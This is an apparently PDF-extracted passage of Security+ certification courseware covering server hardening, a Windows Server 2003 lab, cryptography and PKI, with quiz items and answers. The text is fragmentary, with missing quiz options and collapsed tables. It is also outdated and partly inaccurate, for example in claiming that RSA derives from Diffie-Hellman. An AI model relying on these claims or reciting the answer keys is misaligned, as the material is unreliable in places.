Attacks can be launched by using attachments that contain viruses or other malicious code, by using abnormal MIME headers, or by using malicious scripts embedded in HTML e-mail.
3 The anonymous FTP feature allows clients to connect to an FTP server with minimum authentication. True or false?
True
4 An attack by which the attacker uses a third-party FTP server to connect to a service on the victim machine, rather than connecting directly, is known as ___________.
bounceback
5 An FTP server that receives a PORT command containing a TCP port number less than 1024 should be configured to return response type ___________.
504
Security baselines
1331
Exhibit 13-3: DNS servers Many DNS servers are vulnerable to DNS spoof attacks. For instance, servers that use obsolete versions of BIND, the most common DNS software, are good examples. Its estimated that roughly 12% of DNS servers use versions of BIND that makes them targets for DNS spoof and buffer overflow attacks. Upgrading DNS servers with more current versions of BIND can mitigate such risks. Outdated root.hints file The root.hints file allows a given DNS server to locate the 13 root servers by address. Although its very uncommon, the addresses of these root servers sometimes change. Users who do not keep their root.hints file updated can send queries to addresses that no longer host root servers.
Exhibit 13-4: Deciding which files to download Each packet used in a recursive query includes a tracking number. Hackers monitoring a domain name server can predict the next tracking number in a sequence and send a packet with that number to spoof the response from a legitimate name server. DNS server administrators can mitigate such risks by making sure they have the most updated versions of BIND. Denial-of-service attacks Like other Internet servers, DNS servers are also targeted by DoS attacks. Because of their importance, the root servers typically make a good target for DoS attacks. However, because of the critical role they play for the functioning of the Internet, the root servers are configured with the most secure software and configuration parameters, making it very hard for attackers to take advantage of them. Deployment of real-time monitoring tools enables administrators to identify and quickly block such malicious attempts.
Security baselines
1333
NNTP servers
Network News Transfer Protocol (NNTP) is used to deliver news articles to users on the Internet. NNTP works in much the same way as e-mail does, except messages are delivered to newsgroups, not directly to end users. Newsgroups act as a storage or deposit area for messages that follow a common theme or deal with a common subject matter. A news client instead of an e-mail client is used to read these messages. To gain access to news postings, a user needs access to a news server. These news servers exchange messages by passing on any new messages they receive to other servers down the line. This process is very slow, and it can often take days to circulate a new message to all of the news servers on the system. In the recent past, this type of news application has lost a good deal of its appeal. Many individuals post news articles of dubious use to get a self-serving point across to a large group of people. This spamming of users and user groups has made the use of newsgroups less appealing. Typically, the NNTP server runs as a background process on one host and accepts connections from other hosts on the LAN. NNTP servers, while on a network, have similar vulnerabilities as other network services. Proper authentication mechanisms, disabling of unneeded services, anti-virus scanners, and application of relevant software and OS patches are effective methods of preventing attacks.
C-2:
2 Configuring DNS servers to perform recursive queries also increases the risk of ___________.
spoofing
Cache poisoning Ping of death DNS spoofing DoS attacks Buffer overflow attacks All of the above
B
C D E
4 NNTP is used to deliver news articles to users on the Internet. True or false?
True
5 Typically, the NNTP server runs as a _______________ process on one host and accepts connections from other hosts on the LAN.
background
Deploy authentication mechanisms. Disable unneeded services. Install security patches. Install a virus scanner. All of the above.
Security baselines
1335
DHCP servers
Dynamic Host Configuration Protocol (DHCP) is a protocol for assigning dynamic IP addresses to devices on a network. With dynamic addressing, a device can have a different IP address every time it connects to the network. Dynamic addressing simplifies network administration because the software keeps track of IP addresses rather than requiring an administrator to manage the task. Although its a very useful tool that reduces the administrative burden, DHCP, like most Internet applications, has no security provisions and thus offers opportunities for attackers within an organization. Because DHCP is a broadcast-based protocol, a malicious user can set up a sniffer program to collect critical network information, including IP addressing, subnet mask, default gateway, and even name server information. This information enables an attacker to gain unauthorized access to the network and the resources that reside on it. Because of the lack of security provisions for DHCP, its possible for a malicious user to configure an unauthorized DHCP server in an attempt to spoof the official DHCP server on the network. The original DHCP specification (RFC 2131) supports the use of redundant DHCP servers on the network. Although most clients listen to the last server (legitimate DHCP server) that they received a lease from, its possible for new clients on the network to fall into this trap and receive bogus network configuration information from the attacker. Furthermore, the attacker can launch a DoS attack against the DHCP server, either depleting the pool of available addresses on the server or consuming the resources of the DHCP server and making it unresponsive to client requests. By using such methods, an attacker can prevent users from accessing the network, or an attacker can provide false information about key resources and redirect users to bogus name servers, such as the attackers machine. The attacker could even provide his own IP address as a default gateway to intercept such private or confidential information as passwords.
Security baselines
1337
Following are steps that administrators can take to prevent such attacks from taking place on their networks: Its possible to assign permanent addresses with DHCP. This requires the administrator to collect the Media Access Control (MAC) addresses of all computers on the network and bind those addresses to corresponding IP addresses. However, this task introduces a substantial administrative burden, especially as the network grows. A less secure method is to use dynamic addressing but monitor the log files generated by DHCP, looking for new MAC addresses that can potentially belong to a malicious user. An administrator could also configure the DHCP server to force stations with new MAC addresses on the network to register with the DHCP server. Intrusion detection tools can detect the existence of a new DHCP server (attackers machine) on the network and notify the administrator of this fact. Its also extremely important to have the latest software and patches on the server to minimize risks associated with DHCP-related attacks. Do it!
C-3:
Implement user authentication. Enforce strong user names and passwords. Perform regular account maintenance. Use file encryption where possible. Enable logging.
2 DHCP is a protocol for assigning static IP addresses to devices on a network. True or false?
False. DHCP assigns dynamic IP addresses.
3 An attack that allows a hacker to provide user computer stations with bogus IP address information, such as default gateway and DNS server information, uses the ________ service to execute the attack.
DHCP
4 Because DHCP is a broadcast-based protocol, a malicious user can set up a ________ program to collect critical network information, including IP addressing, subnet mask, default gateway, and even name server information.
sniffer
Directory services
The Lightweight Directory Access Protocol (LDAP) is the industry-standard protocol for providing networking directory services for the TCP/IP model. LDAP can be used to store and locate information about entities, such as organizations, individuals, and other network resources, such as file systems, applications, and configuration information. An LDAP directory is essentially a special kind of database that stores information. Its based on a simple tree-like hierarchy, called a Directory Information Tree (DIT). It starts with a root or source directory, such as a company domain, and branches out to more specific layers, such as departments, then individuals, and so on. Because LDAP is a network protocol for directory services, like other network protocols, its subject to attacks from within the network as well as remote attacks. The security threats to LDAP can be categorized into two groups: directory-service-oriented threats and nondirectory-service-oriented threats: Directory-service-oriented threats include the following: Unauthorized access to data by monitoring or spoofing authorized users operations. Unauthorized access to resources by physically taking over authenticated connections and sessions. Unauthorized modification or deletion of data or configuration parameters. Spoofing of directory services: Such attacks are employed to gain access to sensitive information. They may involve deceiving valid users with a faked directory, or interjecting misleading information into the communications session between the client and the real server. Excessive use of resources. Nondirectory-service-oriented threats include the following: Common network-based attacks against the LDAP servers, including the operating system and opening ports, processes, and services running on the hosts, to compromise the availability of resources. This is accomplished by viruses, worms, Trojan horses, and so forth. Attacks against the hosts by physically accessing the resources (operating system, files and directories, peripheral equipment, and so forth). Attacks against the back-end databases that provide directory services.
1339
LDAP is engineered based on a client-server model that implements two key processes: authentication and authorization. To access the LDAP directory service, the LDAP client must first authenticate itself to the LDAP server. Once the authentication is completed, the server decides which resources, applications, and services are accessible by the client. This is the authorization process. LDAP implements three kinds of authentication methods: Anonymous authentication Simple authentication Simple Authentication and Security Layer (SASL) for LDAPv3 (Kerberos 4 for LDAP v2) The anonymous authentication occurs when no specific authentication method has been chosen. Under such circumstances, the client connects to the server as anonymous, provided that the server allows anonymous connections and allows certain data access for anonymous users. The simple authentication method is to send the LDAP server the authentication field with only the clients password in plaintext. Certainly, this mechanism has security problems because the password is sent in plaintext and is readable if tampered with from the network. To prevent the password from being exposed when simple authentication is used, communications between client and server should occur through a secure channel, such as SSL. Without an underlying secure method of transferal, the simple authentication method is highly vulnerable and should be disabled. SASL is the most secure type of method because it deploys an exchange of encrypted authentication data. Establishing secure requests and responses between the client and the server is just as important as the authentication and authorization processes. Such communication should take place through secure channels or sockets, such as SSL. Currently, most LDAP servers have this capability. To establish SSL connections, a port number should be specified to run the service on the LDAP server. Generally, the LDAP server uses port 636 as a standard SSL socket number of LDAP for TCP and UDP. The directory server can also support custom sockets. But the client has to identify the appropriate socket to access the directory services on the server through SSL.
Databases
The criticality of securing a database depends on a variety of factors, including the degree of confidentiality of the stored data and the access requirements as they relate to day-to-day operations of an organization. Data must be available to authorized people on a continuous basis so they can make intelligent business decisions. Databases can be vulnerable to attacks because of a number of reasons, including their complex structure, misconfiguration, or insecure password storage. The following sections cover general principles of security that should be enforced to protect databases from malicious acts.
1341
Certain database implementations, such as Oracles, have well-known default accounts and passwords that provide varying levels of access to data. During the initial configuration, these accounts should be disabled. A poorly configured database can be exploited to compromise an entire network. Such configuration flaws can provide an attacker with OS-level administration privileges that can be used to attack other network resources. An attacker can do this by gaining access to powerful built-in extended stored procedures. The database must be set up to prevent such exposure. For the database system to function correctly, the database system files must be installed and available. An attacker could crash a database or cause loss of data by removing such system files. Database system files must be set up with restricted Read and Write access so that an attacker cannot remove or modify these files. A security policy may require that all critical data files are stored in an encrypted format. Some databases support full database encryption, which adds another level of protection to the database. Auditing Most database implementations include many auditing features for database access and operations. In addition to database auditing features, changes to critical configuration files (such as the Oracle init file) should be logged to maintain a record of changes to the database. Auditing should take place for the following types of events: unsuccessful attempts to connect to the database; startup and shutdown of the database; viewing, modifying, or removing information from tables; creating or removing objects; and executing programs. Backup and recovery procedures Database corruption, accidental damage, and unauthorized or malicious activity can lead to huge losses without appropriate backup strategies. Backup and recovery procedures should be in place to minimize downtime and financial loss. Keeping information in the database up-to-date is critically important. Without backups and up-to-date information, organizations can suffer dramatic asset losses.
C-4:
Directory services
2 The three authentication types used by LDAPv3 are _______, _________, and _______.
anonymous, simple, SASL
3 The initial accounts created when a database is installed are the most secure accounts to use for user access to the database. True or false?
False. The default accounts and passwords are well known, and provide varying levels of access to the data. These accounts should be disabled.
4 Database system files must be set up with restricted _____________ access so that an attacker cannot remove or modify these files.
Read/Write
Security baselines
1343
Securing computers
Explanation Covering all that needs to be done to completely secure a computer, whether a workstation or a server, is beyond the scope of this section. However, because basic workstation and server security is very similar, this discussion covers the general steps you should take. The following steps should ensure that your system is relatively secure: Remove any unnecessary protocols, such as NetBIOS or IPX, and services. Remove all unnecessary user accounts. Remove all unnecessary shares. Rename the administrator account. Use strong passwords. As mentioned previously, completely securing a personal computer requires that the computer be either disconnected from all network and telecom systems or placed behind a properly designed and implemented firewall. For in-depth defense, install a personal firewall and antivirus package on your system.
1344 CompTIA Security+ Certification Hardening the Windows Server 2003 server
If you plan to use a software-based firewall such as Microsofts ISA server or Checkpoint Firewall-1, it is very important that you harden the server prior to installing the firewall software. Once the hardening process is complete, the server is known as a bastion host. The first step to hardening a server is to apply the latest service pack and all patches and hotfixes. In the following activity, you will Install Windows Server 2003 and apply the latest service pack and patches. Do it!
D-1:
Installing Windows Server 2003 service packs and hotfixes Heres why
If necessary.
Heres how
If time is limited, skip activities D-1 through D-4.
1 Log on to your server as Administrator 2 Insert the Windows Server 2003 CD-ROM Close the autorun window 3 Click Start Choose Run 4 Click Browse 5 Navigate to your CD-ROM drive 6 Double-click English 7 Double-click WIN2003 8 Double-click STANDARD 9 Double-click i386 10 Double-click WINNT32.exe 11 Click OK 12 From the Installation Type dropdown list, select New
Installation (Advanced)
If it appears.
Click Next 13 Accept the license agreement and click Next 14 Enter the product key and click
Next
Security baselines 15 On the Setup Options window, click Advanced Options 16 Change the Windows installation folder to \Bastion Click OK 17 Click Next 18 If you are prompted to upgrade to NTFS, select Use the NTFS
file system (recommended) Otherwise, continue with step 19.
1345
Click Next
.
20 Press e 21 Press g 22 Select the C: drive for the partition Press e 23 Press C
To begin the text-based portion of the server setup. When prompted to repair. If your C: drive is low on space, you can choose another partition. To choose the partition. To continue. The setup program will copy and install files, and then the computer will restart. The GUI portion will then run.
24 In the Regional and Language Options screen, click Next 25 Enter your name and organization Click Next 26 Select Per Device or Per
User To specify the licensing mode.
Click Next
34 Log on as Administrator 35 At the Manage Your Server screen, check Dont display this page at logon and then close the screen 36 Open Internet Explorer 37 Select In the future, do not
show this message in the future If prompted.
Click OK
1347
39 Activate the Security tab Select Internet and move the slider to Medium Click Yes Click OK
Students may be prompted for information about their Internet connection.
Go to http://www.microsoft.com/security
Using Internet Explorer. If prompted, provide information regarding the computers connection to the Internet.
40 Download the latest Service Pack and hotfixes 41 Install the Service Pack 42 Install any additional hotfixes 43 Shut down the server
Do it!
D-2:
Heres how
If time is limited, skip this activity.
1 Boot to the bastion host 2 Log on as Administrator 3 Change the Administrator password to Pa$$word 4 Click Start Choose Run Enter syskey
Notice that the Encryption Disabled option is not available. Windows Server 2003 encrypts the accounts database by default.
5 Click Update 6 Select Password Startup 7 Enter password as the password Click OK Click OK
Youll be notified that the Account Database Startup Key was changed.
Security baselines
1349
D-3:
Heres how
If time is limited, skip this activity.
1 Restart the server 2 Boot to the bastion host 3 For the Startup password, enter
password
4 Log on to the bastion server as Administrator 5 Click Start 6 Choose Administrative Tools, Local Security Policy 7 Expand Account Policies Select Password Policy 8 Double-click Password must
meet complexity requirements
9 Select Enabled Click OK 10 Try to change the Administrator password to password 11 Click Start, then choose Run Enter mmc 12 Choose File, Add/Remove
Snap-in To open a new management console window. It will fail.
1351
20 Click OK 21 Close the mmc window Click Yes Enter Bastion as the File name 22 Click Save 23 Restart the computer 24 Enter password for the Startup password 25 Log on as root
Youll receive a message that this is a private system and that unauthorized use is prohibited. The password is Pa$$word. The bastion.inf security policy template changed the Administrator account to root.
To open a Command window. No IP address is assigned because the security settings have disabled the DHCP client. As such, the machine is now isolated from the network.
Do it!
D-4:
Heres how
If time is limited, skip this activity. Make sure students boot to the original server partition, not the bastion host.
1 Restart the computer and boot to the original server partition, not the bastion host 2 Log on as Administrator 3 Click Start and then right-click
My Computer The password is password.
1353
9 Click Yes
Make sure students dont boot to the bastion host.
10 Boot to the regular server partition and log on as Administrator 11 Click Start, then choose
Control Panel, Network Connections and right-click Local Area Connection
13 Click Advanced Select the WINS tab Select Disable NetBIOS over
TCP/IP
14 Click OK three times 15 Repeat this process for all network cards 16 Open a command window.
Disable DNS before students ping another server by the computer name.
17 Ping another server in the room using only the computer name. 18 Ping another server in the room using the servers IP address 19 Close all open windows
It will fail because NetBIOS is disabled on the server. The ping is successful.
D-5:
Exercises
1 Which of the following is a broadcast-based protocol? A B
C
2 Windows Server 2003 offers another level of TCP/IP protection by supporting which of the following? A
B
C D
3 What are the steps you should take to ensure that your system is relatively secure? A B C D E
F
Remove any unnecessary protocols such as NetBIOS or IPX. Remove all unnecessary user accounts. Remove all unnecessary shares. Rename the administrator account. Use strong passwords. All of the above.
4 To configure TCP/IP filtering you will need to know which of the following? (Choose all that apply.)
A B
C D
Security baselines
1355
Topic B
Topic C
Topic D
Review questions
1 Describe OS/NOS hardening.
The process of modifying an operating systems default configuration to make it more secure from outside threats.
4 Windows Server 2003 only allows pre-defined security templates to be applied since administrator created security templates would leave the network vulnerable to attack. True or false?
False. The administrator can apply pre-made or custom made templates.
6 An administrator might choose to disable an application for which they have not yet obtained a security patch to address a security related problem that has been identified. True or false?
True
7 If an update is critical, you should skip the step of testing it in order to get the update installed as soon as possible. True or false?
False. While you could do this, you are putting the users systems at risk by doing so.
8 What is the trade-off for making systems easily accessible for customers and trade partners?
The easy accessibility makes them vulnerable to hackers and cyber terrorists.
10 Which is less receptive to attacks? A firewall with a static routing configuration or one with a dynamic routing configuration?
A static routing configuration is less receptive to attacks.
11 Which of the following are practices to follow when configuring routers and firewalls? (Choose all that apply.) A Allow IP-directed broadcasts through the system.
B C D
Configure devices with meaningful host names. Configure a loopback address. Restrict data traffic to required ports and protocols.
12 A(n) _________________ is a set of statements that controls the flow of packets through a device based on certain parameters and information contained within a packet.
Access Control List
Security baselines 14 Identify the term that each definition describes: Enhancements to an application.
Updates
1357
17 FTP should only be deployed if there is a legitimate business need due to its insecure nature. True or false?
True
19 List at least three steps you should take to ensure that your system is secure.
Remove unnecessary protocols, remove unnecessary user accounts, remove unnecessary shares, rename the administrator account, and use strong passwords.
3 Create your two groups. From the Computer Management window, right-click the Groups folder in the left pane, and choose New Group. Name the group in the window that opens (according to the preceding table); then click the Add button. Specify or select users to add to this group (according to the preceding table). Follow this procedure to create and populate your second group. Assigning file permissions In this project, youll work with some folders. (The same procedure can be used for files.) 1 From Windows Explorer, create three folders under C:\: Administrative and System Information, Case Data Files, and Sensitive Data (again, this is primarily to keep things simple; normally there would be a lot more categories and folders than this). Here, youll apply permissions to these folders. 2 Right-click on any of the three folders you just created. Choose Properties from the shortcut menu, and activate the Security tab. 3 Click the Add button, and then specify or browse to and select (using the Advanced button) the groups you created to add them to the Name list. 4 Select each group from the Name list, one at a time, to apply appropriate permissions in the Permissions list, based on the matrix you created in the first project. 5 Do the same for the other two folders you created. 6 You can delete the folders that you created in this project, but save the user accounts and groups.
141
Unit 14 Cryptography
Unit time: 180 minutes Complete this unit, and youll know how to:
A Define the concepts of cryptography,
system.
C Explain key management and the
142
Functions of cryptography
Explanation Cryptography is the process of converting readable text (plaintext) into unreadable series of characters and symbols (ciphertext). Cryptography allows users to transmit sensitive information over unsecured networks. Cryptography can be either strong or weak. The time and resources it takes to recover the plaintext measures the strength of a cryptographic method. Cryptography has four primary functions: Confidentiality Authentication Integrity Non-repudiation All are vital components in computer interaction. Confidentiality Confidentiality is often the most widely recognized component of cryptography. The primary purpose of early ciphers was to make sure that information was kept secret. When youre sending important data on a network, its of vital importance that the data remain confidential; otherwise, a company or organization could be giving away trade secrets or other information that could be damaging to the entity.
Cryptography Authentication
143
When data is being transferred, the receiver of a message should be able to verify the origin of that message. Without such authentication services, a data user would never know if the information received was from a legitimate sender or from a malicious attacker masquerading as a legitimate sender. Integrity The data in transit should also pass verification that it has not been tampered with or altered and that it maintains its integrity. Imagine what could happen if a sender sent his data via the network and a malicious third party intercepted the data. The third party could alter the data or add malicious code, such as a virus, and then send the information along to its intended recipient. Without encryption, the recipient would not be able to identify whether the integrity of the data was acceptable, and the recipient could very well use the corrupted data without even knowing it. Non-repudiation Another benefit of cryptography is non-repudiation, which means that the data sender cannot disavow that he or she did or did not send a certain piece of information.
Algorithms
Modern cryptography uses algorithms to encrypt and decrypt data. An algorithm is a set of instructions that works in tandem with a key. The same plaintext data encrypts into different ciphertext with different keys. The security of the data relies on two things: the strength of the algorithm and the secrecy of the key. Different algorithms offer different degrees of security. Determining whether or not an algorithm is sufficient depends on whether or not the cost of breaking the algorithm is greater than the value of the data, in terms of both time and resources needed. Modern cryptography employs two types of algorithms for encrypting and decrypting data: symmetric and asymmetric. The following table provides a quick comparison of the two types of algorithms. Its vital to understand how the two types differ and when you would use one type instead of the other.
Type Symmetric Advantages Single key Disadvantages Requires sender and receiver to agree on a key before transmission of data. Security of the algorithm lies solely with the key. High cost because dissemination of key information must be done over secure channels. Security of keys can be compromised when malicious users post phony keys. Slow method of encryption.
Asymmetric
Encryption and decryption keys are different. The decryption key cannot be calculated from the encryption key.
144
CompTIA Security+ Certification Symmetric algorithms Symmetric algorithms are algorithms in which the encryption key can be calculated from the decryption key and vice versa. In most symmetric algorithms, the encryption and decryption keys are the same. These types of algorithms are also known as secretkey algorithms, single-key algorithms, or one-key algorithms, and they require the sender and receiver to agree on a key before they communicate securely. Therefore, the security of a symmetric algorithm lies with the key. If the key becomes known, anyone can access the encrypted information, as shown in Exhibit 14-1. Symmetric algorithms can be divided into two categories: stream algorithms and block algorithms. Stream algorithms operate on the plaintext one bit at a time; block algorithms encrypt and decrypt the data in groups of bits. Typical block sizes used in everyday computing today are 64 and 128 bits. This type of cryptography was once the only available way to transmit secret information. The obvious problem, of course, was the exchange of keysuntil the key is exchanged, encryption is impossible, but the value of the key makes its security critical. The solution is transmitting the private key over secure channels.
145
In asymmetric algorithms, also known as public-key algorithms, the encryption key and the decryption key are different. Security of asymmetric algorithms is further enhanced by the fact that the decryption key cannot be calculated from the encryption key. Asymmetric algorithms allow for a given hosts encryption key to be made public. Anyone can use the key to encrypt data and send it to the host. However, only the host can decrypt the data by using a corresponding decryption key, as shown in Exhibit 14-2.
Exhibit 14-2: Encryption using an asymmetric algorithm Asymmetric algorithms allow users with no security policies to communicate securely. The need for sharing private keys over a secure channel (as with symmetric algorithms) is unnecessary. Some examples of asymmetric encryption are El Gamal, RSA (named for its inventors last names), and the Digital Signature Algorithm.
146
CompTIA Security+ Certification Common encryption algorithms Most encryption algorithms in use today are based on a structure developed by Horst Feistel of IBM in 1973. Feistel devised a set of parameters to use when creating algorithms for encryption purposes. The principles include: When youre creating ciphers, the larger the block size and key size, the more secure the cipher will be. Using multiple rounds offers increasing security. These concepts have to be balanced with the speed of the execution of the algorithm. With increased computing power, more complex algorithms can be used. The following common algorithms were all developed using this framework. This list is not an exhaustive list of algorithms in use, but it represents a sampling of the most widely known ciphers. Lucifer (1974)IBM developed Lucifer in response to requests for a strong encryption algorithm to be used to protect non-classified data. As the first-ever block cipher developed, it uses a 128-bit key and 16 rounds in the encryption process. Lucifer suffers from a weak key structure and is vulnerable to attacks, yet it still can be effective when used in tandem with other algorithms. Diffie-Hellman (1976)The Diffie-Hellman cipher, named after its developers, uses a public-key system (actually, the oldest public-key system still in use). It offers better performance than other encryption algorithms because its focused on the trading of a shared key between two users. Its commonly used in IPSec. RSA (1977)Named for its developers, Rivest, Shamir, and Adleman, the RSA algorithm is based on the Diffie-Helman cipher. RSA uses a public-key system with a variable key length and block size. RSA is a very flexible algorithm, but with greater key lengths and block sizes, it can be slow to compute in some environments. DES (1977)The Data Encryption Standard (DES) algorithm is a modified version of the Lucifer algorithm. DES was once the most widely used block cipher, and it used a 56-bit key length. In 1998, the Electronic Frontier Foundation cracked the DES algorithm, by using a specifically designed computer, in less than three days. This led to the development of Triple DES. Triple DES (1998)Triple DES uses the same algorithm as DES, but uses three keys and three executions of the algorithm to encrypt and decrypt data, resulting in a 168-bit key. Because of this, its three times slower than DES but much more secure. That said, with current computing capabilities, Triple DES is not foolproof. Triple DES is very easy to implement in encryption systems that currently use DES as their encryption algorithm. IDEA (1992)IDEA is a block cipher operating on 64-bit blocks and using a 128-bit key. The algorithm was developed by Xuejia Lai and James Massey, and its patented for corporate use by the Swiss firm Ascom. IDEA is commonly used in PGP and is a substitute for DES and Triple DES. There are no known attacks at this time for this algorithm. Blowfish (1993)Blowfish was developed as a free, unpatented cipher by Bruce Schneier. Its a 64-bit block cipher that uses variable-length keys. Blowfish is characterized by its ease of implementation, high execution speeds, and low memory usage. At this time, there are no known attacks for this algorithm.
Cryptography
147
RC5 (1995)RC5 was developed by Ronald Rivest for RSA Data Corporation. The RC5 algorithm was created to be suitable for either hardware or software functions. Like Blowfish, its very fast, its easy to implement, and it has low memory usage. RC5 uses a variable key length and a variable number of rounds; this makes it flexible and adaptable. At this time, there are no known attacks for this algorithm. The study of algorithms for use in encryption services continues to create new and improved ciphers. Its important to keep up-to-date on the latest developments, in terms of both new algorithms and new attacks for existing algorithms. Do it!
A-1:
3 Most encryption algorithms in use today are based on a structure developed by Horst Feistel of IBM in 1973. True or false?
True
4 Provide the correct cipher name for each of the descriptions below: 128-bit key with a weak key structure 56-bit key length that is easily cracked 64-bit block cipher that uses variable-length keys Block cipher operating on a 64-bit blocks and using a 128-bit key Fast and easy to implement; no known attacks at this time Three keys and three executions, resulting in a 168-bit key Uses a public-key system, and variable key length and block size Uses a public-key system; commonly used in IPSec
Lucifer DES Blowfish IDEA RC5 Triple DES RSA Diffie-Hellman
148
Hashing
Explanation Hashing is critical to modern cryptography. Hash functions have been used in computer science for verification purposes for many years. Hashing involves taking a variablelength input and converting it to a fixed-length output string (called a hash value). This allows a user to identify whether or not the data received is the same as the data that was sent. If you want to verify that someone has a particular file that you also have, but you dont want it sent to you, you can ask for the hash value of that file. If the hash value sent corresponds to the hash value you have on the same file, you can be reasonably assured that its the same file. Hashing is used in modern cryptography to verify whether or not the data that is being sent over an unsecured channel is not changed in any way. If the data has been modified in any way, the hash value will be different, and the receiving party will know that the data has been corrupted or tampered with. The two most commonly used hash functions are SHA-1 (Secure Hash Algorithm 1), developed by the National Security Agency (NSA), and MD5 (Message Digest algorithm version 5), a product of RSA Security. SHA-1 is considered the more secure of the two algorithms.
Digital signatures
Most public-key algorithms have the useful feature that the public key can decrypt a message encrypted with the private key, as well as the reverse, which is the typical method to ensure privacy. If a public key can successfully decrypt a message, then the only person who could have done the encryption is the holder of the corresponding private key. This application of asynchronous encryption is known as a digital signature. A digital signature is created using a hash function. You perform a hash on the message to create a message digest, a shorter version of the message; then you encrypt the message digest by using your own private key. The digital signature is then appended to a plaintext or encrypted message. The recipient cannot open the digital signature unless the public key of the original sender matches the private key used to encrypt the message digest. The basic process by which a message is encrypted using a digital certificate and then verified by the recipient is as follows: 1 Alice produces a message digest by passing her message through a hashing algorithm. 2 The message digest is then encrypted using Alices private key. 3 Alice sends the message to Bob. 4 Bob creates a message digest from the message, using the same hashing algorithm that Alice used; he then decrypts Alices signature digest by using Alices public key. 5 Bob compares the two message digests: one created by Alice and the other by himself. If the two match, he knows he has received a message from Alice and the message has not been altered. Exhibit 14-3 illustrates this process. The fact that the Bob can use Alices public key to recover the original message digest guarantees its integrity and provides nonrepudiation.
Cryptography
149
Digital certificates
When using public-key cryptography, users should be aware that theyre sending information encrypted with the recipients public key. Malicious users, however, can post a phony key with the name and identification of a potential recipient. If data is encrypted with this phony key, the data is readable only by the malicious user. The first instinct is to send encrypted data to only those keys that you know of firsthand. But what happens if you need to exchange vital information with someone youve never met? The best way to address this issue is to use digital certificates. Digital certificates simplify the task of verifying whether a public key belongs to its owner. A digital certificate acts in much the same way as a passport or drivers license: a trusted authority verifies your identity and then stamps or signs the certificate. If you receive a certificate along with encrypted information, you are guaranteed of the senders authenticity. Digital certificates, as specified in the X.509 certificate standard, contain the following information: Identifying information, such as the users name and identity, a unique serial number, and the validity dates for the life of the certificate. The public key of the certificate holder. The digital signature of the Certification Authority. This component validates the whole package. The CA attaches its signature to the certificate, vouching that the information within the certificate is true. The CA signature, in essence, binds the certificate holders identifying information to the public key, leaving no doubt as to who the true owner of the key is. Some applications for digital certificates include: Secure Web communicationsUse certificates with SSL/TLS protocols for authenticating and encrypting data passed between servers and clients. Secure Web sitesUse certificates to authenticate access to secure Web sites. Secure e-mailEnable Secure Multipurpose Internet Mail Extensions (S/MIME) services to add authentication and privacy to e-mail messages.
A-2:
2 Which of the following are examples of a hash algorithm? (Choose all that apply.) A
B C
3 Hashing checks whether a message has been tampered with. True or false?
True
4 Digital signatures use a private key to encrypt a message digest. If the public key can decrypt the message, then authenticity, integrity, and non-repudiation are proven. True or false?
False. Just integrity and non-repudiation are guaranteed.
5 Digital certificates contain which of the following information? (Choose all that apply.)
A B
Users name and identity Validity dates for the life of the certificate Private key Public key CAs digital signature
C
D E
6 Digital certificates bind the users identity to the public key. True or false?
True
Cryptography
1411
Components
The PKI system establishes a framework for management of private keys and certificates, including defining who is responsible for authentication. PKI standards describe two key roles for validating the identity of the user and issuing the digital certificate: the Certificate Authority and the Registration Authority. In addition, each PKI system has at least one certificate server. Certificate Authority (CA) The Certificate Authority is a person or group who is responsible for issuing certificates to authorized users. The CA creates the certificate and then digitally signs it by using its own private key, thereby guaranteeing the authenticity of the certificate. In addition to certificate generation, the CA is responsible for storing and safeguarding the certificates. Registration Authority (RA) The Registration Authority (RA) is used to offload the work of the CAs. The RA acts as a middleman between the CA and the subscriber, accepting registrations for the CA, validating the subscribers identity, and distributing keys. The RA does not issue certificates on its own.
Trust models
In small organizations, its easy to trace a certification path back to the CA that granted the certificate. But, internal communications are not the only ones requiring validation. Communication with external clients and customers is an everyday occurrence. Its difficult to trust communications from entities who dont appear in an organizations CA. Organizations typically follow a trust model, which explains how users can establish a certificates validity. Three commonly used models are: Single-authority trust (also known as the third-party trust) Hierarchical trust Web of Trust (also known as the Mesh trust)
1413
In the single-authority trust model, a third-party central certifying agency signs a given key and authenticates the owner of the key. The users trust the authority and, by association, trust all keys issued by that authority. Exhibit 14-4 illustrates this model.
1415
In the Web of Trust model (shown in Exhibit 14-6), the key holders sign each others certificates, thereby validating the certificates based on their own knowledge of the key holder. Anyone can sign someone elses public key, becoming an introducer in the process. If a user knows and trusts the introducer, he or she should be willing to trust the public key through association. This model is used in encryption applications, such as PGP, where no central authority exists. The main vulnerability with the Web of Trust is the careless or malicious user who signs bad keys. If just one person in the Web of Trust is negligent, the whole group can be affected.
Unique name of the entity that signed the certificate. This is normally a CA. Using the certificate implies trusting the entity that signed this certificate. Signature using the private key of the entity that issued the certificate.
Public Key Cryptography Standards (PKCS) PKCS is an industry standard developed by RSA Laboratories in cooperation with a consortium of system developers, including Apple, DEC, Lotus, Microsoft, MIT, and Sun. The standard was first published in 1991 to help deploy public-key cryptography. The standard defines encryption algorithms (PKCS #1), Diffie-Hellman and elliptic curve algorithms (PKCS #13), password-based encryption (PKCS #5), private-key standards (PKCS #8), and certification request syntax (PKCS #10).
Cryptography Do it!
1417
B-1:
3 Explain the difference between a certificate policy and certificate practice statement.
The certificate policy is issued with each certificate and describes how that particular certificate will be used. The policy identifies the user community, the names of the CA and RA, and the certificates OID. The certificate practice statement is a published document that explains how the CA runs its business. It includes the CA structure, the standards and protocols used, and the way certificates are managed.
4 For each of the descriptions below, identify whether the trust model is single authority, Web of Trust, or hierarchical. A third-party CA signs a key, authenticating the owner of the key. An introducer signs a colleagues certificate. The trust path leads back to a root CA. This model allows for enforcement of policies and standards throughout the infrastructure.
Single authority
5 Netscape and Microsoft both use X.509 certificates, and any browser can read their certificates. True or false?
False. Both vendors have adapted X.509 to meet their needs, which means that their certificates are not necessarily compatible with other browsers.
6 PKCS was developed by RSA and other system developers to standardize ______________. A B C
D
Encryption algorithms Private-key standards Certification request syntax All of the above
Cryptography
1419
1421
